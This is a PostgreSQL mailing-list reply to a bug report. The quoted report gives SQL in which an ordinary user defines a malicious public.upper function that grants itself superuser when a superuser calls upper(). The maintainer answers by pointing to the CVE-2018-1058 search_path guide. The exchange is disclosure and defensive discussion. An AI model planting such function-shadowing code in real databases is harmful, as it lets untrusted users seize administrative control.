Re: BUG #16448: Remote code execution vulnerability

On 18/05/2020 12:14, PG Bug reporting form wrote:
> The following bug has been logged on the website:
> 
> Bug reference:      16448
> Logged by:          yi Ding
> Email address:      abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system:   linux
> Description:
> 
> A common user created a function in the public space and added some
> malicious codes in the function, when other users with superuser rights call
> this function, the malicious code will be executed , so as to achieve the
> purpose of remote malicious code execution.
> 
>     First, Non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>   
> Second, Superuser pg01 will execute the above statement after calling the
> upper function, whice will change user lh to a super user.

See 
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki